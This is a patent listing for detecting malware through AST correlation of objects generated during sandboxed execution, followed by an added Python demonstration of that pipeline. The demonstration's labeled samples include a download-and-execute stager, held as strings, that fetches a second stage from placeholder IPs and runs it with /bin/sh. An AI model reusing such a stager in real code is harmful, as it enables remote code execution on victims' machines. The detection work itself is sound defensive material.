Enhanced malware detection for generated objects
First Claim
1. A system to detect malware generated by an object, the system comprising:
a storage device;
one or more processors communicatively coupled to the storage device, the one or more processors configured to execute dynamic analysis logic, an Abstract Syntax Tree (AST) generator, a correlation engine, a classification engine and a reporting engine, wherein
the dynamic analysis logic, stored in the storage device and configured with a monitoring logic, to process the object and identify features associated with the processing of the object, detect an object generated during the processing of the object, and provide the generated object to the AST generator and the correlation engine;
the AST generator, stored in the storage device, being configured to receive the generated object, generate an AST representation of the generated object and remove one or more parameters from the AST representation prior to providing the AST representation to the correlation engine;
the correlation engine, stored in the storage device, being configured to (i) receive the features generated during the processing of the object by the dynamic analysis logic and the AST representation and (ii) perform a correlation of at least the AST representation with a labeled set of one or more ASTs associated with known malicious objects, to generate a likelihood of maliciousness;
the classification engine, stored in the storage device, being configured to receive from the correlation engine the likelihood of maliciousness associated with the generated object and the AST representation, and classifying the object as malicious in response to the correlation; and
the reporting engine being configured to generate and issue alerts in response to the object being classified as malicious by the classification engine.
7 Assignments
0 Petitions
Abstract
A computerized method to identify malicious code generated by seemingly benign objects is described. The described malware detection system identifies generated objects (code) and analyzes each generated object to collect features which may be associated with maliciousness. The analysis may determine whether an Abstract Syntax Tree (AST) representation of the generated object is correlated with the ASTs of known malware. Correlation of the features identified during processing of the generated objects, including the sequence of generated objects, may be used in classifying the originating object as malicious. The malware detection system may communicate with one or more endpoint devices to influence detection and reporting of behaviors and malware by those devices.
22 Claims
1. A system to detect malware generated by an object (independent claim; full text given under First Claim above). Dependent claims: 2-15.
16. A computerized method for detecting a generated malware cyber-attack, the method comprising:
monitoring the processing of a first object in a virtual machine of a malware detection system; and
responsive to detecting a second object generated during processing of the first object by an application operating within the virtual machine, where the second object is different than the first object, providing the generated second object to an Abstract Syntax Tree (AST) generator;
generating an AST representation by the AST generator for the received generated second object and providing the AST representation to a correlation engine;
determining correlation results, by the correlation engine, based at least in part on the received AST representation and providing the correlation results to a classification engine; and
classifying, by the classification engine, the first object as malicious in response to the received correlation results exceeding a maliciousness threshold.
Dependent claims: 17-22.
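The pipeline that the abstract and claims 1 and 16 describe (dynamic analysis hands a generated object to an AST generator, the generator strips parameters, a correlation engine scores the AST against labeled known-malicious ASTs, a classification engine applies a threshold) is shown below as an added example. It is not the patent's code and the patent fixes none of these choices: it assumes the generated objects are Python scripts, uses Python's `ast` module as the AST generator, reads "remove one or more parameters" as replacing literals with type placeholders, uses Jaccard similarity over 3-grams of AST node tokens as the correlation, and takes 0.8 as the maliciousness threshold. Every script in it is a constructed sample.

```python
"""Added example, not the patent's own code: AST generation with parameter
stripping, correlation against labeled malicious ASTs, and threshold
classification for one generated object.  Language, AST library, similarity
metric, threshold and all samples are assumptions not stated in the patent."""
import ast
from typing import Dict, List, Set, Tuple

# Labeled set of known-malicious generated objects (constructed sample): a
# download-and-execute stager of the kind a document macro might write out.
KNOWN_MALICIOUS_OBJECTS: Dict[str, str] = {
    "download_exec": (
        "import urllib.request, subprocess\n"
        'body = urllib.request.urlopen("http://198.51.100.7/stage2").read()\n'
        'open("/tmp/.cache", "wb").write(body)\n'
        'subprocess.Popen(["/bin/sh", "/tmp/.cache"])\n'
    ),
}

# Generated objects as the dynamic analysis logic would hand them over
# (constructed).  The variant keeps the stager's structure, changes every literal.
GENERATED_VARIANT = (
    "import urllib.request, subprocess\n"
    'body = urllib.request.urlopen("https://203.0.113.44/update.bin").read()\n'
    'open("/var/tmp/.u", "wb").write(body)\n'
    'subprocess.Popen(["/bin/sh", "/var/tmp/.u"])\n'
)
GENERATED_BENIGN = (
    "import datetime\n"
    "stamp = datetime.datetime.now().isoformat()\n"
    'open("/tmp/report.txt", "w").write(stamp)\n'
)

MALICIOUSNESS_THRESHOLD = 0.8  # assumed value; the patent leaves it unspecified


class ParameterStripper(ast.NodeTransformer):
    """AST generator step: replace each literal (URL, path, mode, port) with a
    placeholder naming only its type, so attacker-chosen parameters drop out
    and only code structure plus API usage remain for correlation."""

    def visit_Constant(self, node: ast.Constant) -> ast.AST:
        placeholder = ast.Constant(value=f"<{type(node.value).__name__}>")
        return ast.copy_location(placeholder, node)


def generate_ast(source: str, strip_parameters: bool = True) -> ast.AST:
    tree = ast.parse(source)
    if strip_parameters:
        tree = ast.fix_missing_locations(ParameterStripper().visit(tree))
    return tree


def ast_tokens(tree: ast.AST) -> List[str]:
    """Flatten the AST (breadth-first via ast.walk) into node tokens.  Names and
    attribute names stay because API usage is the behavioural signal; literal
    values survive only when parameters were not stripped."""
    tokens: List[str] = []
    for node in ast.walk(tree):
        token = type(node).__name__
        if isinstance(node, ast.Constant):
            token += f"={node.value!r}"
        elif isinstance(node, ast.Attribute):
            token += f".{node.attr}"
        elif isinstance(node, ast.Name):
            token += f":{node.id}"
        tokens.append(token)
    return tokens


def shingles(tokens: List[str], n: int = 3) -> Set[Tuple[str, ...]]:
    """Overlapping n-grams of the token stream: the unit the correlation compares."""
    return {tuple(tokens[i:i + n]) for i in range(max(1, len(tokens) - n + 1))}


def jaccard(a: Set[Tuple[str, ...]], b: Set[Tuple[str, ...]]) -> float:
    return len(a & b) / len(a | b) if (a | b) else 0.0


def correlate(generated_source: str, strip_parameters: bool = True,
              labeled: Dict[str, str] = KNOWN_MALICIOUS_OBJECTS) -> Tuple[float, str]:
    """Correlation engine: the likelihood of maliciousness is the best Jaccard
    score of the generated object's AST against the labeled malicious ASTs."""
    probe = shingles(ast_tokens(generate_ast(generated_source, strip_parameters)))
    scores = {label: jaccard(probe, shingles(ast_tokens(generate_ast(src, strip_parameters))))
              for label, src in labeled.items()}
    nearest = max(scores, key=scores.get)
    return scores[nearest], nearest


def classify(generated_source: str, threshold: float = MALICIOUSNESS_THRESHOLD) -> Dict[str, object]:
    """Classification engine: the originating object is malicious when the
    correlation result exceeds the threshold (claim 16's wording)."""
    likelihood, nearest = correlate(generated_source)
    return {"likelihood": round(likelihood, 3), "nearest_label": nearest,
            "malicious": likelihood > threshold}


if __name__ == "__main__":
    for name, src in (("variant", GENERATED_VARIANT), ("benign", GENERATED_BENIGN)):
        print(name, classify(src))
    print("variant with literals kept:", round(correlate(GENERATED_VARIANT, False)[0], 3))
```

Running the script shows the point of the parameter-removal step: with literals stripped the re-parameterised variant matches the labeled stager exactly and is classified malicious, while the same variant compared with literals kept scores below 1.0 because every URL and path differs; the benign script stays under the threshold. The correlation metric and the threshold are placeholders for whatever the real engine uses, and the labeled set would be far larger than one entry.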